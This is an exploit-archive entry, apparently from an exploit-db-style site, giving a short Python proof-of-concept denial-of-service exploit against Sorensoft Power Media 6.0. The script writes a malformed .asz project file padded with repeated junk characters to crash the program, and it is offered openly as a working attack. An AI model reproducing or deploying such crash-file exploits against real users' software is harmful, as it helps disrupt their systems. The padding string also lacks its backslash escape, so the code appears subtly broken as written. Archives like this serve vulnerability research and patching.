[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Sorensoft Power Media 6.0 Denial of Service
# Published : 2012-05-31
# Author :
# Previous Title : Able2Doc and Able2Doc Professional v 6.0 Memory Corruption
# Next Title : Slimpdf Reader 1.0 Memory Corruption


#!/usr/bin/python
#
# Exploit Title: Sorensoft Power Media 6.0 (out of memory)
# software: Sorensoft power media
# version : 6.0
# link: www.sorensoft.com
# Author: Onying (@onyiing)
# Website: otakku-udang.blogspot.com
# Tested on: Windows XP SP3

junk ="x41"*500
textfile = open("test.asz" , 'w')
textfile.write("ASzf      Options.dat"+junk)
textfile.close()